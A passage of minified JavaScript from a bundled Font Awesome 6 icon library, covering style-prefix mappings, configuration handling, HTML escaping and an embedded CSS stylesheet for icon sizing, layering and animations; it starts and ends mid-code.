_b=pb((Ws(gA={},vr,{fa:"solid",fas:"solid","fa-solid":"solid",far:"regular","fa-regular":"regular",fal:"light","fa-light":"light",fat:"thin","fa-thin":"thin",fad:"duotone","fa-duotone":"duotone",fab:"brands","fa-brands":"brands",fak:"kit","fa-kit":"kit"}),Ws(gA,Qr,{fa:"solid",fass:"solid","fa-solid":"solid"}),gA)),gb=pb((Ws(CA={},vr,{solid:"fas",regular:"far",light:"fal",thin:"fat",duotone:"fad",brands:"fab",kit:"fak"}),Ws(CA,Qr,{solid:"fass"}),CA)),Cb=pb((Ws(yA={},vr,{fab:"fa-brands",fad:"fa-duotone",fak:"fa-kit",fal:"fa-light",far:"fa-regular",fas:"fa-solid",fat:"fa-thin"}),Ws(yA,Qr,{fass:"fa-solid"}),yA)),$ye=pb((Ws(bA={},vr,{"fa-brands":"fab","fa-duotone":"fad","fa-kit":"fak","fa-light":"fal","fa-regular":"far","fa-solid":"fas","fa-thin":"fat"}),Ws(bA,Qr,{"fa-solid":"fass"}),bA)),Kye=/fa(s|r|l|t|d|b|k|ss)?[\-\ ]/,CB="fa-layers-text",Xye=/Font ?Awesome ?([56 ]*)(Solid|Regular|Light|Thin|Duotone|Brands|Free|Pro|Sharp|Kit)?.*/i,Yye=pb((Ws(MA={},vr,{900:"fas",400:"far",normal:"far",300:"fal",100:"fat"}),Ws(MA,Qr,{900:"fass"}),MA)),yB=[1,2,3,4,5,6,7,8,9,10],Jye=yB.concat([11,12,13,14,15,16,17,18,19,20]),Zye=["class","data-prefix","data-icon","data-fa-transform","data-fa-mask"],yb=new Set;Object.keys(gb[vr]).map(yb.add.bind(yb)),Object.keys(gb[Qr]).map(yb.add.bind(yb));var ebe=[].concat(N8,fb(yb),["2xs","xs","sm","lg","xl","2xl","beat","border","fade","beat-fade","bounce","flip-both","flip-horizontal","flip-vertical","flip","fw","inverse","layers-counter","layers-text","layers","li","pull-left","pull-right","pulse","rotate-180","rotate-270","rotate-90","rotate-by","shake","spin-pulse","spin-reverse","spin","stack-1x","stack-2x","stack","ul","duotone-group","swap-opacity","primary","secondary"]).concat(yB.map(function(t){return"".concat(t,"x")})).concat(Jye.map(function(t){return"w-".concat(t)})),bb=vp.FontAwesomeConfig||{};Mr&&"function"==typeof Mr.querySelector&&[["data-family-prefix","familyPrefix"],["data-css-prefix","cssPrefix"],["data-family-default","familyDefault"],["data-style-default","styleDefault"],["data-replacement-class","replacementClass"],["data-auto-replace-svg","autoReplaceSvg"],["data-auto-add-css","autoAddCss"],["data-auto-a11y","autoA11y"],["data-search-pseudo-elements","searchPseudoElements"],["data-observe-mutations","observeMutations"],["data-mutate-approach","mutateApproach"],["data-keep-original-source","keepOriginalSource"],["data-measure-performance","measurePerformance"],["data-show-missing-icons","showMissingIcons"]].forEach(function(t){var a=w8(t,2),i=a[1],n=function ibe(t){return""===t||"false"!==t&&("true"===t||t)}(function tbe(t){var a=Mr.querySelector("script["+t+"]");if(a)return a.getAttribute(t)}(a[0]));null!=n&&(bb[i]=n)});var bB={styleDefault:"solid",familyDefault:"classic",cssPrefix:"fa",replacementClass:pB,autoReplaceSvg:!0,autoAddCss:!0,autoA11y:!0,searchPseudoElements:!1,observeMutations:!0,mutateApproach:"async",keepOriginalSource:!0,measurePerformance:!1,showMissingIcons:!0};bb.familyPrefix&&(bb.cssPrefix=bb.familyPrefix);var G1=ia(ia({},bB),bb);G1.autoReplaceSvg||(G1.observeMutations=!1);var Ca={};Object.keys(bB).forEach(function(t){Object.defineProperty(Ca,t,{enumerable:!0,set:function(e){G1[t]=e,Mb.forEach(function(i){return i(Ca)})},get:function(){return G1[t]}})}),Object.defineProperty(Ca,"familyPrefix",{enumerable:!0,set:function(a){G1.cssPrefix=a,Mb.forEach(function(e){return e(Ca)})},get:function(){return G1.cssPrefix}}),vp.FontAwesomeConfig=Ca;var Mb=[],xu={size:16,x:0,y:0,rotate:0,flipX:!1,flipY:!1};function vb(){for(var t=12,a="";t-- >0;)a+="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"[62*Math.random()|0];return a}function j1(t){for(var a=[],e=(t||[]).length>>>0;e--;)a[e]=t[e];return a}function L8(t){return t.classList?j1(t.classList):(t.getAttribute("class")||"").split(" ").filter(function(a){return a})}function MB(t){return"".concat(t).replace(/&/g,"&amp;").replace(/"/g,"&quot;").replace(/'/g,"&#39;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function vA(t){return Object.keys(t||{}).reduce(function(a,e){return a+"".concat(e,": ").concat(t[e].trim(),";")},"")}function z8(t){return t.size!==xu.size||t.x!==xu.x||t.y!==xu.y||t.rotate!==xu.rotate||t.flipX||t.flipY}function vB(){var t="fa",a=pB,e=Ca.cssPrefix,i=Ca.replacementClass,n=':root, :host {\n  --fa-font-solid: normal 900 1em/1 "Font Awesome 6 Solid";\n  --fa-font-regular: normal 400 1em/1 "Font Awesome 6 Regular";\n  --fa-font-light: normal 300 1em/1 "Font Awesome 6 Light";\n  --fa-font-thin: normal 100 1em/1 "Font Awesome 6 Thin";\n  --fa-font-duotone: normal 900 1em/1 "Font Awesome 6 Duotone";\n  --fa-font-sharp-solid: normal 900 1em/1 "Font Awesome 6 Sharp";\n  --fa-font-brands: normal 400 1em/1 "Font Awesome 6 Brands";\n}\n\nsvg:not(:root).svg-inline--fa, svg:not(:host).svg-inline--fa {\n  overflow: visible;\n  box-sizing: content-box;\n}\n\n.svg-inline--fa {\n  display: var(--fa-display, inline-block);\n  height: 1em;\n  overflow: visible;\n  vertical-align: -0.125em;\n}\n.svg-inline--fa.fa-2xs {\n  vertical-align: 0.1em;\n}\n.svg-inline--fa.fa-xs {\n  vertical-align: 0em;\n}\n.svg-inline--fa.fa-sm {\n  vertical-align: -0.0714285705em;\n}\n.svg-inline--fa.fa-lg {\n  vertical-align: -0.2em;\n}\n.svg-inline--fa.fa-xl {\n  vertical-align: -0.25em;\n}\n.svg-inline--fa.fa-2xl {\n  vertical-align: -0.3125em;\n}\n.svg-inline--fa.fa-pull-left {\n  margin-right: var(--fa-pull-margin, 0.3em);\n  width: auto;\n}\n.svg-inline--fa.fa-pull-right {\n  margin-left: var(--fa-pull-margin, 0.3em);\n  width: auto;\n}\n.svg-inline--fa.fa-li {\n  width: var(--fa-li-width, 2em);\n  top: 0.25em;\n}\n.svg-inline--fa.fa-fw {\n  width: var(--fa-fw-width, 1.25em);\n}\n\n.fa-layers svg.svg-inline--fa {\n  bottom: 0;\n  left: 0;\n  margin: auto;\n  position: absolute;\n  right: 0;\n  top: 0;\n}\n\n.fa-layers-counter, .fa-layers-text {\n  display: inline-block;\n  position: absolute;\n  text-align: center;\n}\n\n.fa-layers {\n  display: inline-block;\n  height: 1em;\n  position: relative;\n  text-align: center;\n  vertical-align: -0.125em;\n  width: 1em;\n}\n.fa-layers svg.svg-inline--fa {\n  -webkit-transform-origin: center center;\n          transform-origin: center center;\n}\n\n.fa-layers-text {\n  left: 50%;\n  top: 50%;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n  -webkit-transform-origin: center center;\n          transform-origin: center center;\n}\n\n.fa-layers-counter {\n  background-color: var(--fa-counter-background-color, #ff253a);\n  border-radius: var(--fa-counter-border-radius, 1em);\n  box-sizing: border-box;\n  color: var(--fa-inverse, #fff);\n  line-height: var(--fa-counter-line-height, 1);\n  max-width: var(--fa-counter-max-width, 5em);\n  min-width: var(--fa-counter-min-width, 1.5em);\n  overflow: hidden;\n  padding: var(--fa-counter-padding, 0.25em 0.5em);\n  right: var(--fa-right, 0);\n  text-overflow: ellipsis;\n  top: var(--fa-top, 0);\n  -webkit-transform: scale(var(--fa-counter-scale, 0.25));\n          transform: scale(var(--fa-counter-scale, 0.25));\n  -webkit-transform-origin: top right;\n          transform-origin: top right;\n}\n\n.fa-layers-bottom-right {\n  bottom: var(--fa-bottom, 0);\n  right: var(--fa-right, 0);\n  top: auto;\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: bottom right;\n          transform-origin: bottom right;\n}\n\n.fa-layers-bottom-left {\n  bottom: var(--fa-bottom, 0);\n  left: var(--fa-left, 0);\n  right: auto;\n  top: auto;\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: bottom left;\n          transform-origin: bottom left;\n}\n\n.fa-layers-top-right {\n  top: var(--fa-top, 0);\n  right: var(--fa-right, 0);\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: top right;\n          transform-origin: top right;\n}\n\n.fa-layers-top-left {\n  left: var(--fa-left, 0);\n  right: auto;\n  top: var(--fa-top, 0);\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: top left;\n          transform-origin: top left;\n}\n\n.fa-1x {\n  font-size: 1em;\n}\n\n.fa-2x {\n  font-size: 2em;\n}\n\n.fa-3x {\n  font-size: 3em;\n}\n\n.fa-4x {\n  font-size: 4em;\n}\n\n.fa-5x {\n  font-size: 5em;\n}\n\n.fa-6x {\n  font-size: 6em;\n}\n\n.fa-7x {\n  font-size: 7em;\n}\n\n.fa-8x {\n  font-size: 8em;\n}\n\n.fa-9x {\n  font-size: 9em;\n}\n\n.fa-10x {\n  font-size: 10em;\n}\n\n.fa-2xs {\n  font-size: 0.625em;\n  line-height: 0.1em;\n  vertical-align: 0.225em;\n}\n\n.fa-xs {\n  font-size: 0.75em;\n  line-height: 0.0833333337em;\n  vertical-align: 0.125em;\n}\n\n.fa-sm {\n  font-size: 0.875em;\n  line-height: 0.0714285718em;\n  vertical-align: 0.0535714295em;\n}\n\n.fa-lg {\n  font-size: 1.25em;\n  line-height: 0.05em;\n  vertical-align: -0.075em;\n}\n\n.fa-xl {\n  font-size: 1.5em;\n  line-height: 0.0416666682em;\n  vertical-align: -0.125em;\n}\n\n.fa-2xl {\n  font-size: 2em;\n  line-height: 0.03125em;\n  vertical-align: -0.1875em;\n}\n\n.fa-fw {\n  text-align: center;\n  width: 1.25em;\n}\n\n.fa-ul {\n  list-style-type: none;\n  margin-left: var(--fa-li-margin, 2.5em);\n  padding-left: 0;\n}\n.fa-ul > li {\n  position: relative;\n}\n\n.fa-li {\n  left: calc(var(--fa-li-width, 2em) * -1);\n  position: absolute;\n  text-align: center;\n  width: var(--fa-li-width, 2em);\n  line-height: inherit;\n}\n\n.fa-border {\n  border-color: var(--fa-border-color, #eee);\n  border-radius: var(--fa-border-radius, 0.1em);\n  border-style: var(--fa-border-style, solid);\n  border-width: var(--fa-border-width, 0.08em);\n  padding: var(--fa-border-padding, 0.2em 0.25em 0.15em);\n}\n\n.fa-pull-left {\n  float: left;\n  margin-right: var(--fa-pull-margin, 0.3em);\n}\n\n.fa-pull-right {\n  float: right;\n  margin-left: var(--fa-pull-margin, 0.3em);\n}\n\n.fa-beat {\n  -webkit-animation-name: fa-beat;\n          animation-name: fa-beat;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out);\n          animation-timing-function: var(--fa-animation-timing, ease-in-out);\n}\n\n.fa-bounce {\n  -webkit-animation-name: fa-bounce;\n          animation-name: fa-bounce;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1));\n          animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1));\n}\n\n.fa-fade {\n  -webkit-animation-name: fa-fade;\n          animation-name: fa-fade;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n          animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n}\n\n.fa-beat-fade {\n  -webkit-animation-name: fa-beat-fade;\n          animation-name: fa-beat-fade;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n          animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n}\n\n.fa-flip {\n  -webkit-animation-name: fa-flip;\n          animation-name: fa-flip;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out);\n          animation-timing-function: var(--fa-animation-timing, ease-in-out);\n}\n\n.fa-shake {\n  -webkit-animation-name: fa-shake;\n          animation-name: fa-shake;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, linear);\n          animation-timing-function: var(--fa-animation-timing, linear);\n}\n\n.fa-spin {\n  -webkit-animation-name: fa-spin;\n          animation-name: fa-spin;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 2s);\n          animation-duration: var(--fa-animation-duration, 2s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, linear);\n          animation-timing-function: var(--fa-animation-timing, linear);\n}\n\n.fa-spin-reverse {\n  --fa-animation-direction: reverse;\n}\n\n.fa-pulse,\n.fa-spin-pulse {\n  -webkit-animation-name: fa-spin;\n          animation-name: fa-spin;\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, steps(8));\n          animation-timing-function: var(--fa-animation-timing, steps(8));\n}\n\n@media (prefers-reduced-motion: reduce) {\n  .fa-beat,\n.fa-bounce,\n.fa-fade,\n.fa-beat-fade,\n.fa-flip,\n.fa-pulse,\n.fa-shake,\n.fa-spin,\n.fa-spin-pulse {\n    -webkit-animation-delay: -1ms;\n            animation-delay: -1ms;\n    -webkit-animation-duration: 1ms;\n            animation-duration: 1ms;\n    -webkit-animation-iteration-count: 1;\n            animation-iteration-count: 1;\n    transition-delay: 0s;\n    transition-duration: 0s;\n  }\n}\n@-webkit-keyframes fa-beat {\n  0%, 90% {\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  45% {\n    -webkit-transform: scale(var(--fa-beat-scale, 1.25));\n            transform: scale(var(--fa-beat-scale, 1.25));\n  }\n}\n@keyframes fa-beat {\n  0%, 90% {\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  45% {\n    -webkit-transform: scale(var(--fa-beat-scale, 1.25));\n            transform: scale(var(--fa-beat-scale, 1.25));\n  }\n}\n@-webkit-keyframes fa-bounce {\n  0% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  10% {\n    -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n            transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n  }\n  30% {\n    -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n            transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n  }\n  50% {\n    -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n            transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n  }\n  57% {\n    -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n            transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n  }\n  64% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  100% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n}\n@keyframes fa-bounce {\n  0% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  10% {\n    -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n            transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n  }\n  30% {\n    -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n            transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n  }\n  50% {\n    -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n            transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n  }\n  57% {\n    -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n            transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n  }\n  64% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  100% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n}\n@-webkit-keyframes fa-fade {\n  50% {\n    opacity: var(--fa-fade-opacity, 0.4);\n  }\n}\n@keyframes fa-fade {\n  50% {\n    opacity: var(--fa-fade-opacity, 0.4);\n  }\n}\n@-webkit-keyframes fa-beat-fade {\n  0%, 100% {\n    opacity: var(--fa-beat-fade-opacity, 0.4);\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  50% {\n    opacity: 1;\n    -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125));\n            transform: scale(var(--fa-beat-fade-scale, 1.125));\n  }\n}\n@keyframes fa-beat-fade {\n  0%, 100% {\n    opacity: var(--fa-beat-fade-opacity, 0.4);\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  50% {\n    opacity: 1;\n    -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125));\n            transform: scale(var(--fa-beat-fade-scale, 1.125));\n  }\n}\n@-webkit-keyframes fa-flip {\n  50% {\n    -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n            transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n  }\n}\n@keyframes fa-flip {\n  50% {\n    -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n            transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n  }\n}\n@-webkit-keyframes fa-shake {\n  0% {\n    -webkit-transform: rotate(-15deg);\n            transform: rotate(-15deg);\n  }\n  4% {\n    -webkit-transform: rotate(15deg);\n            transform: rotate(15deg);\n  }\n  8%, 24% {\n    -webkit-transform: rotate(-18deg);\n            transform: rotate(-18deg);\n  }\n  12%, 28% {\n    -webkit-transform: rotate(18deg);\n            transform: rotate(18deg);\n  }\n  16% {\n    -webkit-transform: rotate(-22deg);\n            transform: rotate(-22deg);\n  }\n  20% {\n    -webkit-transform: rotate(22deg);\n            transform: rotate(22deg);\n  }\n  32% {\n    -webkit-transform: rotate(-12deg);\n            transform: rotate(-12deg);\n  }\n  36% {\n    -webkit-transform: rotate(12deg);\n            transform: rotate(12deg);\n  }\n  40%, 100% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n}\n@keyframes fa-shake {\n  0% {\n    -webkit-transform: rotate(-15deg);\n            transform: rotate(-15deg);\n  }\n  4% {\n    -webkit-transform: rotate(15deg);\n            transform: rotate(15deg);\n  }\n  8%, 24% {\n    -webkit-transform: rotate(-18deg);\n            transform: rotate(-18deg);\n  }\n  12%, 28% {\n    -webkit-transform: rotate(18deg);\n            transform: rotate(18deg);\n  }\n  16% {\n    -webkit-transform: rotate(-22deg);\n            transform: rotate(-22deg);\n  }\n  20% {\n    -webkit-transform: rotate(22deg);\n            transform: rotate(22deg);\n  }\n  32% {\n    -webkit-transform: rotate(-12deg);\n            transform: rotate(-12deg);\n  }\n  36% {\n    -webkit-transform: rotate(12deg);\n            transform: rotate(12deg);\n  }\n  40%, 100% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n}\n@-webkit-keyframes fa-spin {\n  0% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n  100% {\n    -webkit-transform: rotate(360deg);\n            transform: rotate(360deg);\n  }\n}\n@keyframes fa-spin {\n  0% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n  100% {\n    -webkit-transform: rotate(360deg);\n            transform: rotate(360deg);\n  }\n}\n.fa-rotate-90 {\n  -webkit-transform: rotate(90deg);\n          transform: rotate(90deg);\n}\n\n.fa-rotate-180 {\n  -webkit-transform: rotate(180deg);\n          transform: rotate(180deg);\n}\n\n.fa-rotate-270 {\n  -webkit-transform: rotate(270deg);\n          transform: rotate(270deg);\n}\n\n.fa-flip-horizontal {\n  -webkit-transform: scale(-1, 1);\n          transform: scale(-1, 1);\n}\n\n.fa-flip-vertical {\n  -webkit-transform: scale(1, -1);\n          transform: scale(1, -1);\n}\n\n.fa-flip-both,\n.fa-flip-horizontal.fa-flip-vertical {\n  -webkit-transform: scale(-1, -1);\n          transform: scale(-1, -1);\n}\n\n.fa-rotate-by {\n  -webkit-transform: rotate(var(--fa-rotate-angle, none));\n          transform: rotate(var(--fa-rotate-angle, none));\n}\n\n.fa-stack {\n  display: inline-block;\n  vertical-align: middle;\n  height: 2em;\n  position: relative;\n  width: 2.5em;\n}\n\n.fa-stack-1x,\n.fa-stack-2x {\n  bottom: 0;\n  left: 0;\n  margin: auto;\n  position: absolute;\n  right: 0;\n  top: 0;\n  z-index: var(--fa-stack-z-index, auto);\n}\n\n.svg-inline--fa.fa-stack-1x {\n  height: 1em;\n  width: 1.25em;\n}\n.svg-inline--fa.fa-stack-2x {\n  height: 2em;\n  width: 2.5em;\n}\n\n.fa-inverse {\n  color: var(--fa-inverse, #fff);\n}\n\n.sr-only,\n.fa-sr-only {\n  position: absolute;\n  width: 1px;\n  height: 1px;\n  padding: 0;\n  margin: -1px;\n  overflow: hidden;\n  clip: rect(0, 0, 0, 0);\n  white-space: nowrap;\n  border-width: 0;\n}\n\n.sr-only-focusable:not(:focus),\n.fa-sr-only-focusable:not(:focus) {\n  position: absolute;\n  width: 1px;\n  height: 1px;\n  padding: 0;\n  margin: -1px;\n  overflow: hidden;\n  clip: rect(0, 0, 0, 0);\n  white-space: nowrap;\n  border-width: 0;\n}\n\n.svg-inline--fa .fa-primary {\n  fill: var(--fa-primary-color, currentColor);\n  opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa .fa-secondary {\n  fill: var(--fa-secondary-color, currentColor);\n  opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-primary {\n  opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-secondary {\n  opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa mask .fa-primary,\n.svg-inline--fa mask .fa-secondary {\n  fill: black;\n}\n\n.fad.fa-inverse,\n.fa-duotone.fa-inverse {\n  color: var(--fa-inverse, #fff);\n}';if(e!==t||i!==a){var r=new RegExp("\\.".concat(t,"\\-"),"g"),c=new RegExp("\\--".concat(t,"\\-"),"g"),d=new RegExp("\\.".concat(a),"g");n=n.replace(r,".".concat(e,"-")).replace(c,"--".concat(e,"-")).replace(d,".".concat(i))}return n}var AB=!1;function W8(){Ca.autoAddCss&&!AB&&(function obe(t){if(t&&Kh){var a=Mr.createElement("style");a.setAttribute("type","text/css"),a.innerHTML=t;for(var e=Mr.head.childNodes,i=null,n=e.length-1;n>-1;n--){var r=e[n],c=(r.tagName||"").toUpperCase();["STYLE","LINK"].indexOf(c)>-1&&(i=r)}Mr.head.insertBefore(a,i)}}(vB()),AB=!0)}var mbe={mixout:function(){return{dom:{css:vB,insertCss:W8}}},hooks:function(){return{beforeDOMElementCreation:function(){W8()},beforeI2svg:function(){W8()}}}},Yh=vp||{};Yh[Xh]||(Yh[Xh]={}),Yh[Xh].styles||(Yh[Xh].styles={}),Yh[Xh].hooks||(Yh[Xh].hooks={}),Yh[Xh].shims||(Yh[Xh].shims=[]);var Im=Yh[Xh],TB=[],AA=!1;function hbe(t){!Kh||(AA?setTimeout(t,0):TB.push(t))}function Ab(t){var a=t.tag,e=t.attributes,i=void 0===e?{}:e,n=t.children,r=void 0===n?[]:n;return"string"==typeof t?MB(t):"<".concat(a," ").concat(function sbe(t){return Object.keys(t||{}).reduce(function(a,e){return a+"".concat(e,'="').concat(MB(t[e]),'" ')},"").trim()}(i),">").concat(r.map(Ab).join(""),"</").concat(a,">")}function EB(t,a,e){if(t&&t[a]&&t[a][e])return{prefix:a,iconName:e,icon:t[a][e]}}Kh&&((AA=(Mr.documentElement.doScroll?/^loaded|^c/:/^loaded|^i|^c/).test(Mr.readyState))||Mr.addEventListener("DOMContentLoaded",function t(){Mr.removeEventListener("DOMContentLoaded",t),AA=1,TB.map(function(a){return a()})}));var F8=function(a,e,i,n){var T,k,q,r=Object.keys(a),c=r.length,d=void 0!==n?function(a,e){return function(i,n,r,c){return a.call(e,i,n,r,c)}}(e,n):e;for(void 0===i?(T=1,q=a[r[0]]):(T=0,q=i);T<c;T++)q=d(q,a[k=r[T]],k,a);return q};function V8(t){var a=function pbe(t){for(var a=[],e=0,i=t.length;e<i;){var n=t.charCodeAt(e++);if(n>=55296&&n<=56319&&e<i){var r=t.charCodeAt(e++);56320==(64512&r)?a.push(((1023&n)<<10)+(1023&r)+65536):(a.push(n),e--)}else a.push(n)}return a}(t);return 1===a.length?a[0].toString(16):null}function DB(t){return Object.keys(t).reduce(function(a,e){var i=t[e];return i.icon?a[i.iconName]=i.icon:a[e]=i,a},{})}function B8(t,a){var e=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},i=e.skipHooks,n=void 0!==i&&i,r=DB(a);"function"!=typeof 